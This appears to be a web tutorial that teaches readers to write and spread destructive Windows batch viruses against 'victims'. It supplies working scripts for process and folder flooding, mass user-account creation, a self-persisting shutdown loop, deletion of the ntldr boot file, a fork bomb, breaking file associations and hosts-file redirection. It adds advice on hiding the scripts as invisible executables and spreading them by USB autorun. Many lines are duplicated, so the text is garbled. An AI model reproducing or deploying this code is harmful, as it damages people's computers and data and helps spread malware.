How dangerous could a batch file be?
Hi users, today we could just you give the codes to paste in
notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready.
But instead of that, we have focused on making the basics of batch files clear
and developing the approach to code your own viruses.
notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready.
But instead of that, we have focused on making the basics of batch files clear
and developing the approach to code your own viruses.
Lets begin with a simple example , Open your command prompt
and change your current directory to ‘desktop’ by typing ‘cd desktop’ without
quotes.
and change your current directory to ‘desktop’ by typing ‘cd desktop’ without
quotes.
Now type these commands one by one
1. md x //makes directory ‘x’ on desktop
2. cd x // changes current directory to ‘x’
3. md y // makes a directory ‘y’ in directory ‘x’
Lets do the same thing in an other way. Copy
these three commands in notepad and save file as anything.bat
these three commands in notepad and save file as anything.bat
Now just double click on this batch file and the same work
would be done , You will get a folder ‘x’ on your desktop and folder ‘y’ in it.
This means the three commands executed line by line when we ran the batch
file
would be done , You will get a folder ‘x’ on your desktop and folder ‘y’ in it.
This means the three commands executed line by line when we ran the batch
file
So a batch file is simply a text containing series of
commands which are executed automatically line by line when the batch file is
run.
commands which are executed automatically line by line when the batch file is
run.
What can batch viruses do ?
They can be used to delete the windows files, format data,
steal information, irritate victim, consume CPU resources to affect performance,
disable firewalls, open ports, modify or destroy registry and for many more
purposes.
steal information, irritate victim, consume CPU resources to affect performance,
disable firewalls, open ports, modify or destroy registry and for many more
purposes.
Now lets start with simple codes, Just copy the code to
notepad and save it as anything.bat (I am anything you wish but extension must
be bat and save it as ‘all files’ instead of text files).
notepad and save it as anything.bat (I am anything you wish but extension must
be bat and save it as ‘all files’ instead of text files).
Note: Type ‘help’ in command prompt to know about some
basic commands and to know about using a particular command , type
‘command_name /?’ without quotes.
basic commands and to know about using a particular command , type
‘command_name /?’ without quotes.
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
:x
net user %random% /add //create user account
goto x
This code would start creating windows user accounts whose names could be any random numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and
Settings\Administrator\Start Menu\Programs\Startup”
Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start
Menu\Programs\Startup” //these two commands will copy the
batchfile in start up folders (in XP)
Menu\Programs\Startup” //these two commands will copy the
batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in
0 seconds
0 seconds
Note
: Files in Start up folder gets started automatically when
windows starts . You should first two lines of code in every
virus code so that it would copy itself in startup folder. Start up folder path
in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
: Files in Start up folder gets started automatically when
windows starts . You should first two lines of code in every
virus code so that it would copy itself in startup folder. Start up folder path
in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
Everytime the victim would start the computer, the batch
file in start up would run and shutdown the computer immediately. You can
remove this virus by booting the computer in Safe Mode and deleting the batch
file from Start Up folder.
file in start up would run and shutdown the computer immediately. You can
remove this virus by booting the computer in Safe Mode and deleting the batch
file from Start Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option ‘Hide operating system files’ and
check option ‘Show hidden files and folders’. Click apply
check option ‘Show hidden files and folders’. Click apply
Now you can see the operating system files. There is a one
file ‘ntldr’ which is boot loader used to boot the windows.
file ‘ntldr’ which is boot loader used to boot the windows.
Lets make a batch file to
delete this file from victim’s computer and the windows will
not start then.
not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only
attribute , hidden file attribute respectively
attribute , hidden file attribute respectively
del
ntldr //delete ntldr file
ntldr //delete ntldr file
After running this batch file , system will not reboot and a
normal victim would definitely install the windows again.
normal victim would definitely install the windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly
in order to saturate the process table of windows. It will just hang the
windows .
in order to saturate the process table of windows. It will just hang the
windows .
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension
.txt with filetype anything.
.txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a file type like extension
‘exe’ is is associated with filetype ‘exefile’. To see them, just enter
command ‘assoc’ in command prompt.
‘exe’ is is associated with filetype ‘exefile’. To see them, just enter
command ‘assoc’ in command prompt.
Above code changes the association of some
extensions to filetype ‘anything’ (means u can write anything) which obviously
doesn’t exist. So all exe (paint,games,command prompt and many
more),jpeg,png,mpeg files wouldn’t open properly.
extensions to filetype ‘anything’ (means u can write anything) which obviously
doesn’t exist. So all exe (paint,games,command prompt and many
more),jpeg,png,mpeg files wouldn’t open properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at
c:\windows\system32\drivers\etc. We can place a website and an IP in front of
it. By doing this, we want our web browser to take us to host located at that
IP when that website name would be entered. I mean request to resolve IP of
website is not sent to Domain Name Server(DNS) if the name of website in hosts
file.
c:\windows\system32\drivers\etc. We can place a website and an IP in front of
it. By doing this, we want our web browser to take us to host located at that
IP when that website name would be entered. I mean request to resolve IP of
website is not sent to Domain Name Server(DNS) if the name of website in hosts
file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com >
C:\windows\system32\drivers\etc\hosts //this command prints or add
xxx.xxx.xxx.xxx. www.anything.com in hosts file.
C:\windows\system32\drivers\etc\hosts //this command prints or add
xxx.xxx.xxx.xxx. www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com with IP
address and website of your choice. You can take/redirect victim to any host
located at specific IP when he wud try to log on to specific website or u can
simply block any website by entering its name and any invalid IP address.
address and website of your choice. You can take/redirect victim to any host
located at specific IP when he wud try to log on to specific website or u can
simply block any website by entering its name and any invalid IP address.
Viruses we just coded
Note : Most of the batch viruses are simply undetectable
by any anitiviruses
by any anitiviruses
Tip : Coding good viruses just depends on the DOS
commands you know and logic you use.
commands you know and logic you use.
Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file
in notepad.
in notepad.
2.The command prompt screen pops up,it alerts the victim and
he can stop it.
he can stop it.
To overcome these limitations,we need to convert these batch
files into executable files that is exe files.
files into executable files that is exe files.
first download this Batch To Exe coverter with the help of goggling .
After running converter , open the batch file virus ,
Save as exe file , set visibility mode ‘Invisible application’ , than just
click on compile button.
Save as exe file , set visibility mode ‘Invisible application’ , than just
click on compile button.
You can use other options as per your
requirement.
requirement.
Spreading batch viruses through pen drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus
‘anything.bat’ in pendrive .
‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will
launch anything.bat and commands in batch file virus would execute.
launch anything.bat and commands in batch file virus would execute.
Enjoy…….